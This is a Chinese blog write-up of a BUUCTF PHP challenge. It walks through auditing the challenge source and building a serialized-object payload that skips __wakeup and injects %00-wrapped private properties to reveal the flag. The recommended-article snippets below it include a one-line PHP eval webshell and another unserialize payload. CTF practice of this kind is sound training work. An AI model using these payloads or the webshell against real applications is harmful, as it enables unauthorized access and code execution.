ctf每日练习-第五天

最新推荐文章于 2024-04-28 05:12:03 发布
最新推荐文章于 2024-04-28 05:12:03 发布
阅读量314 收藏 1
点赞数
分类专栏: ctf-WP 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46743327/article/details/108430390
版权

上午去了一趟图书馆,可是昨天真的太累了,今天上午完全打不起精神,就蹉跎了一上午,中午回来做了做题。

[极客大挑战 2019]PHP(来自buuctfweb区)

在这里插入图片描述打开网站,唯一的提示就是备份,所以我们扫描一下网站

发现有一个www.zip,我们下载下来
发现里面有一个flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

果然是备份文件,没有任何用。

再看index.php

  <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

发现有一个反序列化,并且是用get方式传递值

所以我们看一下class,php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>


审计代码,发现需要最后反序列化时username为admin,并且password	为100才能echo $flag(当前的文件,不是备份的那个文件)
而wake_up会将username变成user,所以需要绕过一下

先序列化

在这里插入图片描述
得到
O:4:“Name”:2:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}

当对象成员变量个数多于实际个数的时候,wake_up会不运行,可以达成绕过
ps:关于wake_up漏洞,可以看一下这篇文章
大佬的文章

O:4:“Name”:3:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}

这里要注意的是,因为两个变量都是私有变量,所以需要在变量名和类名前加上%00

这篇文章里知识比较详细:大佬的博客

最后O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}
直接在url里加上/?select=O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}

在这里插入图片描述

_wand1
关注
专栏目录
备战CTF
weixin_40707492的博客
07-21 6676
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
CTF | REVERSE练习之API定位
qq_42646885的博客
07-23 1027
目描述: 主机C:\Reverse\2目录下有一个CrackMe2.exe程序,运行这个程序的时候会提示输入一个密码,当输入正确的密码时,会弹出过关提示消息框,请对CrackMe2.exe程序进行逆向分析和调试,找到正确的过关密码。 实验步骤: 1、外部行为分析 在随便输入字符和不输入字符时情况如下: 所以目的是找到一个正确的密码输入。 2、查看是否加壳 选中程...
ctf web5 练习_针对CTF,大家都是怎么训练的?
weixin_39611072的博客
12-20 214
Github:sunnyelf (Jing Ling)CTF Group:473831530(集各路赛棍大牛,听说进群得先解出flag : P)**********************************************************学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P******************************...
攻防世界Web-unserialize3
05-14 366
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。 payload: ?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";} 转载于:https://www.cnblogs.com/JKding233/p/108642...
BUUCTF笔记之Web系列部分WriteUp(二)
克格莫(有需要的私信)
05-17 2501
1、[极客大挑战 2019]Http 不敢置信12世纪了还有这种简单,我还在拼命扫目录和备份。。。。 在secret.php重发http请求头 Referer: https://www.Sycsecret.com 修改User-Agent为Syclover: 这里伪造来源IP 添加一个字段X-Forwarded-For: 127.0.0.1 拿到flag. ...
一小白的CTF练习(持续更新~)
qq_68093438的博客
09-28 878
一个小白从0开始学习网安的记录~
CTF-PWN学习-为缺少指导的同学而生_ctf pwn
最新发布
2401_84296945的博客
04-28 1075
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
python 每日一练之0005➕os方法简单学习
Peanuts
06-17 294
前言自己的编程能力太不足了,最近开始每日一练,望大佬勿喷,学习记录下正文第 0005 : 你有一个目录,装了很多照片,把它们的尺寸变成都不大于 iPhone5 分辨率的大小。这是目,这里我用到的是PIL和os模块中的一些功能贴出代码#! usr/local/bin/python3.6 #-*- coding: utf-8 -*- import os from PIL import Image...
网络安全(黑客)—2024自学手册
S18374的博客
04-26 889
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
Web安全工程师成长路线
sanMu_blog的博客
06-24 8897
Web安全工程师 职位描述: 对公司网站、业务系统进行安全评估测试(黑盒、白盒测试);对公司各类系统进行安全加固;对公司安全事件进行响应,清理后门,根据日志分析攻击途径;安全技术研究,包括安全防范技术,黑客技术等;跟踪最新漏洞信息,进行业务产品的安全检查。 职位要求: 熟悉主流的Web安全技术,...
我的第一道web类CTF——一起来撸猫o(=•ェ•=)m
Zhiyilang的博客
01-08 1055
第一道web类CTF——一起来撸猫🐱o(=•ェ•=)m
[CTF从0到1学习] 一、CTF 概述
qq_43710889的博客
11-13 6076
[CTF从0到1学习] 一、CTF 概述 哈哈,在学校图书馆借到的一本比较好的讲CTF的书籍,因为有配套资料。感觉不错,准备研读一波。先做一个引言吧‘’ 首先大家能搜到这篇文章,也一定对CTF有一定了解,亦或是对网络安全感兴趣。这篇文章会分享CTF的起源,模式,所需要的基本技能的一个概述。 文章目录[CTF从0到1学习] 一、CTF 概述CTF起源CTF模式CTF必备的基础技能CTF环境搭建 CTF起源 CTF起源与1996年的DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的
BUUCTF记录 老八小超市儿
m0_46576074的博客
05-28 488
[GKCTF2020]老八小超市儿 进入网址 admin.php进入后台 账号admin 密码shopxo 应用中心——应用商城——主 下载默认主 编写一个a.php文件放进默认主 a.php文件内容 <?php @eval($_POST[a]); phpinfo(); ?> 测试成功性 http://771c3e8f-4cea-4775-be69-fce5b8bd52f2.node3.buuoj.cn/public/static/index/default/a.ph
[极客大挑战 2019]PHP
4pri1
02-03 194
[极客大挑战 2019]PHP 打开后,按照提示找备份文件 用御剑没扫到东西,换个工具dirsearch 找到备份文件 在url栏构造下载 http://f0ff483f-62c5-4bf6-9e34-5e02147967e0.node3.buuoj.cn/www.zip 解压文件,查看flag,假的。。 审计一下这几个的代码吧 flag.php里的$flag 给了个值Syc{dog_dog_dog_dog},好像没啥用。 [外链图片转存失败,源站可能有防盗链机
BUUCTF记录(2)
bmth666的博客
05-07 1916
文章目录web[De1CTF 2019]SSRF Me[极客大挑战 2019]PHP web [De1CTF 2019]SSRF Me [极客大挑战 2019]PHP 由于有备份文件,尝试www.zip发现可以下载!!! 得到flag.php文件,但发现Syc{dog_dog_dog_dog}并不是。。。。然后查看class.php得到 <?php include 'flag.php';...
ctfphp常见的考点
热门推荐
一个安全研究员
11-06 1万+
本博文转自:大佬博客(侵权删) 总结的很详细,忍不住转载 系统变量 123456 $_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET,$_POST,$_C
ctfshow反序列化
njh18790816639的博客
04-18 1160
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情 exp (Exploit )漏洞利用,一般是个demo程序 poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现 vul:(Vulnerability) :漏洞 Pwn:是一个
CTF之萌新反序列化学习
bmth666的博客
01-13 5650
概念 数据(变量)序列化(持久化) 将一个变量的数据“转换为”字符串,但并不是类型转换,目的是将该字符串储存在本地。相反的行为称为反序列化。 序列化和反序列化的目:使得程序间传输对象会更加方便 # 相关函数 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值